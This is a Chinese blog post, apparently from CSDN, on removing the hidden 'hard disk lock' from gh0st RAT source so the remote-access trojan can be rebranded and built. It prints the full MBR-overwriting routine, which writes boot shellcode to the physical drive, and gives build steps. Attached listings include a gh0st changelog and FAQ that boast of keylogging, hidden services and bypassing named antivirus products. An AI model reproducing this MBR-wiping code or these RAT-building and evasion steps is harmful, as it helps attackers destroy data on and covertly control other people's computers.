gh0st去硬盘锁

最新推荐文章于 2022-08-10 16:41:24 发布
最新推荐文章于 2022-08-10 16:41:24 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: Gh0st源码
这几天闲来无事,下载了个 gh0st 源码,由于刚开始没有仔细看是否去了硬盘锁,差点整个硬盘都费了。

gh0st硬盘锁是源码的作者为了保护版权而设置的,如果我们直接更改版权会造成硬盘被锁,中了硬盘锁的后果是非常严重的,特别是你电脑里有重要数据的时候,这样会导致你电脑里的数据全部丢失!
    如果你没去硬盘锁,又改了版权,那么打开gh0st控制端后会一闪就关闭了,这样就是中硬盘锁了,中了硬盘锁之后将不能重装系统,只能重新对硬盘进行分区。

   gh0st去硬盘锁其实很简单,主要分为以下几部:

 

1 ghost.cpp文件中注释或删除以下代码(可以搜索这段代码unsigned char scode[] = 

[cpp]  view plain copy print ?
  1. /* 
  2. unsigned char scode[] = 
  3. "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" 
  4. "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" 
  5. "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; 
  6.  
  7. int CGh0stApp::KillMBR() 
  8. { 
  9.     HANDLE hDevice; 
  10.     DWORD dwBytesWritten, dwBytesReturned; 
  11.     BYTE pMBR[512] = {0}; 
  12.      
  13.     // 重新构造MBR 
  14.     memcpy(pMBR, scode, sizeof(scode) - 1); 
  15.     pMBR[510] = 0x55; 
  16.     pMBR[511] = 0xAA; 
  17.      
  18.     hDevice = CreateFile 
  19.         ( 
  20.         "\\\\.\\PHYSICALDRIVE0", 
  21.         GENERIC_READ | GENERIC_WRITE, 
  22.         FILE_SHARE_READ | FILE_SHARE_WRITE, 
  23.         NULL, 
  24.         OPEN_EXISTING, 
  25.         0, 
  26.         NULL 
  27.         ); 
  28.     if (hDevice == INVALID_HANDLE_VALUE) 
  29.         return -1; 
  30.     DeviceIoControl 
  31.         ( 
  32.         hDevice,  
  33.         FSCTL_LOCK_VOLUME,  
  34.         NULL,  
  35.         0,  
  36.         NULL,  
  37.         0,  
  38.         &dwBytesReturned,  
  39.         NULL 
  40.         ); 
  41.     // 写入病毒内容 
  42.     WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
  43.     DeviceIoControl 
  44.         ( 
  45.         hDevice,  
  46.         FSCTL_UNLOCK_VOLUME,  
  47.         NULL,  
  48.         0,  
  49.         NULL,  
  50.         0,  
  51.         &dwBytesReturned,  
  52.         NULL 
  53.         ); 
  54.     CloseHandle(hDevice); 
  55.  
  56.     ExitProcess(-1); 
  57.     return 0; 
  58. } 
  59. */  


 

BuildView.cpp文件中注释或删除以下代码

 

[cpp]  view plain copy print ?
  1. /* 
  2.     char    strVer[10]; 
  3.     char    strTitle[10]; 
  4.  
  5.     strVer[0] = 'C'; 
  6.     strVer[1] = '.'; 
  7.     strVer[2] = 'R'; 
  8.     strVer[3] = 'u'; 
  9.     strVer[4] = 'f'; 
  10.     strVer[5] = 'u'; 
  11.     strVer[6] = 's'; 
  12.     strVer[7] = ' '; 
  13.     strVer[8] = 'S'; 
  14.     strVer[9] = '\0'; 
  15.  
  16.     strTitle[0] = 'G'; 
  17.     strTitle[1] = 'h'; 
  18.     strTitle[2] = '0'; 
  19.     strTitle[3] = 's'; 
  20.     strTitle[4] = 't'; 
  21.     strTitle[5] = ' '; 
  22.     strTitle[6] = 'R'; 
  23.     strTitle[7] = 'A'; 
  24.     strTitle[8] = 'T'; 
  25.     strTitle[9] = '\0'; 
  26.  
  27.     CString str; 
  28.     GetDlgItemText(IDC_STATIC_VER, str); 
  29.     if (str.Find(strVer) == -1) 
  30.         ((CGh0stApp *)AfxGetApp())->KillMBR(); 
  31.  
  32.     GetParent()->GetWindowText(str); 
  33.     if (str.Find(strTitle) == -1) 
  34.         ((CGh0stApp *)AfxGetApp())->KillMBR(); 
  35.     */  


 

ghost.h文件中注释或删除以下代码

[cpp]  view plain copy print ?
  1. //int KillMBR();  


 

即注释或删除出现KillMBR4处。

编译顺序从下往上依次编译,即先svchost files工程,然后install files工程,最后ghost files工程

网络编程释疑之:TCP连接拔掉网线后会发生什么
weixin_33806300的博客
12-14 1133
背景:前些天团队在进行终端设备和服务器端长连接业务的测试时,发现了这么一个情况:在拔掉设备端的网线后,再插上网线,有时可以继续正常的进行长接连请求,而且用的还是拔掉网线之前的那个长连接。但是有时却不能继续正常的长连接请求,需要重新建立一个新的长连接。让我尤感诧异的是第一种网线断开再插上后长连接可以恢复的情况,彻底颠覆了我一直抱有的一个所谓的“物理连接”的观念。究竟怎么回事,我们来探个究竟。首先说说...
Gh0st源码+硬盘锁
12-12
注: 软件不断更新中,有什么意见大家多多提,偶看可以的就采纳.....gh0st的成长,离不开大家的帮助. 2008/1/27 11:16 : 优化了屏幕传输算法,CPU利用率更低 2008/1/27 16:06 : 驱动以资源方式写入安装文件跟DLL文件中,优化屏幕传输 2008/1/27 17:26 : 修正驱动安装时的一个Bug 2008/1/28 05:28 : 服务端安装强化,加入服务检测,守护线程强化,加入禁用监视,顺便做了下免杀 2008/1/29 12:47 : 改变服务端安装启动方式,隐藏服务,掉驱动程序和守护线程,感谢Lzx无私的帮助... 2008/1/29 16:12 : 修正键盘记录重复问题,优化服务端上线方式 2008/1/30 04:11 : 修正服务端网络内核的一个导致异常的Bug,优化服务端大小到100K 2008/1/31 01:28 : 重写服务端网络内核,加入数据包验证,及重发功能,更加稳定 2008/1/31 11:36 : 修正服务端网络内核一个导致数据包混乱的问题,加入帧速限制,传输不稳定的情况从此消失... 2008/2/01 10:54 : 主动防御功能加强,过卡巴全监控,瑞星,Kis6,Kis7,Norton,ZoneAlarm,江民2008等杀毒软件.下个版本准备过所有杀软的主动...期待吧. 2008/2/01 14:18 : 加入服务端异常处理,更新稳定,请各位帮助测试.. 2008/2/01 15:39 : 修正服务端删除后不能安装的致命错误 2008/2/01 23:35 : 改写了下服务端一些函数,增加稳定性,春季过后重写服务端吧,简洁下程序. 2008/2/02 19:51 : 修正服务端视频监控功能的一些BUG 2008/2/03 00:40 : 屏幕监控加入显示远程鼠标功能 2008/2/05 16:46 : 重写屏幕传输算法,屏幕传输更快,控制更稳定.. 2008/2/05 23:45 : 还是网络内核跟屏幕传输方面,只求更快,不求最快,前版本屏幕传输有问题,旧版本不能上线,请用最新版本... 2008/2/06 17:32 : 服务端做了些优化,加入跟踪远程光标的功能,旧版本不能上线,请用最新版本 2008/2/07 00:57 : 改了些服务端,没事优化优化,准备过完年,大整一下,新年快乐... 2008/2/07 16:02 : 没事加了个托盘功能,做了些代码优化,一个人过年,有点郁闷... 2008/2/07 20:42 : 修正服务端一个句柄泄漏的问题.. 2008/2/08 22:08 : 全面优化了下服务端,新加了备注功能. 2008/2/09 22:58 : 修正一些大家提到的问题,Gh0st RAT Beta 2.1 发布 2008/2/11 00:18 : 修正服务端安装的一个BUG,静心研究ACE中,暂停更新................... 2008/2/17 16:14 : 保存配置文件,服务端支持socks5代理上线,加入下载更新功能,屏幕控制加入,黑屏,锁定等功能 2008/2/20 10:49 : 应大家要求,看了看江民2008的垃圾主动,连注册表都没,随便改了下服务端,过江民2008主动.其它有啥主动过不了的,抓图,我抽空解决 Gh0st问答: 2008/2/20 09:26 : 改了下服务端一些网络方面的东西,看对2003掉线情况是否有效,望大家测试,多谢了. 2008/2/21 15:43 : 服务端掉线问题,重启后不上线问题,测试版本,请大家测试 2008/2/22 19:47 : 解决重启后服务端不上线问题,加强对抗主动防御的功能 2008/2/23 17:11 : 全面优化了下服务端,加强稳定性,请大家测试 2008/2/23 19:03 : 修正视频监视的一个小BUG 2008/2/24 01:55 : 文件管理中加入本地和远程运行功能,优他了部分代码,旧版本不会上线,请用新版本 2008/2/24 12:56 : 修正文件管理中一个低级错误,下载更新的一个错误 2008/2/26 00:00 : 完美解决重复安装,重复上线问题,发布gh0st2.5,准备第二阶段的开发,重点在稳定,实用上.... 声明下软件的安装方式: 如果安装时发现有相同配置的服务端已经安装过,就不安装也不删除,跟鸽子一个原理,我是靠字串区别的 2008/3/2 06:35 : 本着我写gh0st的初衷,一个共享,免费,的软件,到今天为止,算是对大家一个交代,新版本开发中,此版本开源..装上VC6,打造属于你们自己的gh0st吧.. 本人不保留版权,任何信息,自由修改,多谢一直以来大家的支持,我会继续努力的 在此声明:此软件无作者,无版权,由此软件造成的任何不良后果与红狼无关,多谢!!!! 1:为什么服务端下线后,控制端没反应 答:控制端检测心跳包间隔为1分钟,过一分钟后,自然就下线了 2:下线后多长时间才能再上线 答:服务端断线重连间隔为1分钟 3:怎么找不到在哪控制屏幕,跟键盘的离线记录 答:在标题栏点右键,也就是系统菜单,就能看到 4:为什么有时会出现重复上线的问题 答:服务端发生异常,就会重新连接创建第二个连接,但是第一个连接已经断开了,控制端在其心跳超时的情况下,会删除 心跳超时为1分钟,也就是说,重复上线情况会持续一分钟,自然就没有了 5:有些大家提到的有些功能,为什么没有加上 答:gh0st作者有自己的想法,自己的宗旨 6:提出建议或问题后多长时间能解决 答:偶以最快的速度,把gh0st做的专业,强大,稳定. 7: 如果做免杀??? 答:服务端用ResourceHacker或者别的资源提取工具打开,会看到两个资源,分别是DLL文件和恢复SSDT的驱动,开始动手吧.... 8:能不能加入系统服务管理的功能呢? 答:系统服务管理,注册表管理等这些,我感觉没必要加才不加的,服务管理sc就能搞定,注册表reg就搞定,服务端加这些函数,对免杀也有影响 9:希望能够加入服务端安装判断的功能,要不然连续运行两次,就上线两次。 答:现在服务端安装是共享模式,可以安装多个,上线多个,实际上不是重复上线,版本稳定后,服务端三种安装模式:独占模式,单一模式,共享模式,顾名思义的理解吧 10: ...虚位以待...
Gh0st3.6+已硬盘锁+win7.zip
08-13
Gh0st3.6+已硬盘锁+win7
gh0st源码/硬盘锁和驱动/未做其它修改
06-19
已经除了硬盘锁和驱动的gh0st远控, 没有对代码进行其它的任何修改, 保持原汁原味
gh0st源码硬盘锁与驱动
record
12-13 959
硬盘锁: 1.打开源文件gh0st.cpp(搜索unsigned char scode[] =) 注释以下部分: /*    unsigned char scode[] =    "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"    "\x00\xba\x1d\x0e\xcd\x10\xe2\
Gh0st Rat BetaV3.6源码+程序(硬盘锁).7z
06-21
其它细节方面的功能大家自己发现吧 功能: 文件管理 完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名 屏幕监视 扫描算法速度最快可达到120帧/秒,差异算法适合网络极差的情况下传输,传输速度快...
Gh0st3.6_硬盘锁源码
03-17
Gh0st3.6_硬盘锁源码】是一个关于远程控制软件Gh0st的特定版本,其中“硬盘锁”意味着这个源码已经移除了对硬盘的加密限制,使得用户能够更自由地使用和研究。Gh0st是一款著名的远程控制工具,它允许操作者...
gh0st3.6_已硬盘锁_20210202_VS2017编译通过_注意杀毒软件.rar
03-03
Gh0st3.6版本,已屏蔽硬盘锁,WIN10+VS2017 Console版本编译通过
Gh0st3.6原版(未经修改,记得硬盘锁哦).rar
12-13
Gh0st3.6原版(未经修改,记得硬盘锁哦).rar
Gh0st源码学习(二)硬盘锁和驱动
liujiayu2的专栏
05-26 1913
一、硬盘锁   GH0st硬盘锁是源码的作者为了保护版权而设置的,如果我们直接更改版权会造成硬盘被锁   中了硬盘锁的后果是非常严重的,特别是你电脑里有重要数据的时候,这样会导致你电脑里的数据全部丢失!    1、搜索    unsigned char scode[] =     位置:\Gh0st3.6原版\gh0st\gh0st.cpp(220):unsigned char sco
WIN7(64bit)编译运行gh0st3.6
桂华流瓦的别致小院
08-05 3218
一、安装VC6+SDK+WDK 注意事项: 1、在安装或者使用VC++6.0时,凡是出现兼容性问题的提示对话框,一律勾选“不再显示此消息”,然后选择“运行程序”。 2、在安装VC的时候,选择“custom(自定义安装)”,特别注意在安装的时候不要选择TOOLS里面的OLE/COM OBJECT VIEWER工具,就可以顺利安装,这只是一个查看工具,不会影响VC++的编译。 3、安装SDK的
关于UAC执行级别
qq_40239944的博客
08-10 747
https://blog.csdn.net/liujiayu2/article/details/44174431
__stdcall和__cdecl的区别
weixin_33692284的博客
10-15 288
__stdcall和__cdecl是两种函数名字修饰。(注意是连续的两个下划线) Windows上 windows上不管是C还是C++,默认使用的都是__stdcall方式。 不论__stdcall还是__cdecl函数参数都是从可向左入栈的,并且由调用者完成入栈操作。对于__stdcall方式被调用者自身在函数返回前清空堆栈;而__cdecl则由调用者维护内存堆栈,所以调用者函数生成的汇编...
QT乱码总结6.编码测试和总结一
liujiayu2的专栏
11-20 930
QT乱码总结0.Qt乱码产生因素https://blog.csdn.net/liujiayu2/article/details/103167953 QT乱码总结1.Unicode 和 UTF-8https://blog.csdn.net/liujiayu2/article/details/103168020 QT乱码总结2.gbk和ANSI和gb2312的区别https://blog.csdn...
PostgreSQL 常用数据类型介绍
ningyuanhuo的专栏
06-08 3571
一、数值类型:    下面是PostgreSQL所支持的数值类型的列表和简单说明:名字存储空间描述范围smallint2 字节小范围整数-32768 到 +32767integer4 字节常用的整数-2147483648 到 +2147483647bigint8 字节大范围的整数-9223372036854775808 到 9223372036854775807decimal变长用户声明精度,精确...
socks5代理服务器协议的说明
liujiayu2的专栏
06-16 3万+
socks5 socks5代理和socks4 socks4a比,多了一个验证功能和udp代理的功能。 socks5的tcp代理几乎和socks4 socks4a一样简单,但是udp却比较复杂一点,但是再复杂也没有http代理那么复杂。 首先说验证,不管是要代理tcp还是udp,开始验证都是要一个tcp连接的,而且验证过程一样,验证完了才分tcp和udp的实际代理过程,有好几种验证
内存泄露、内存溢出以及解决方法
热门推荐
一个程序员的修炼之路
05-10 6万+
内存泄露是指程序在运行过程中动态申请的内存空间不再使用后没有及时释放,从而很可能导致应用程序内存无线增长。更广义的内存泄露包括未对系统的资源的及时释放,比如句柄等。 内存溢出即用户在对其数据缓冲区操作时,超过了其缓冲区的边界;尤其是对缓冲区写操作时,缓冲区的溢出很可能导致程序的异常。 一.内存泄露 “知己知彼,方能百战不殆”,如果我们能够比较清楚的了解在编程的时候哪些情况容易导致内存泄露,通
C++ 格式控制符setiosflags
长风破浪会有时,直挂云帆济沧海
09-24 1417
setiosflags(ios::fixed)是用定点方式表示实数。  使用setprecision(n)可控制输出流显示浮点数的数字个数。C++默认的流输出数值有效位是6。 如果setprecision(n)与setiosflags(ios::fixed)合用,可以控制小数点右边的数字个数。 如果setprecision(n)与setiosnags(ios::scientifi
gh0st源代码深度分析与硬盘锁技术研究
从压缩包中的子文件名称“Gh0st3.6_硬盘锁”来看,该文件很可能是某个特定版本(3.6版)的gh0st源代码或编译后的程序,并且已经除了“硬盘锁”机制。硬盘锁是一种常见的软件保护机制,用于绑定程序与特定硬盘的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值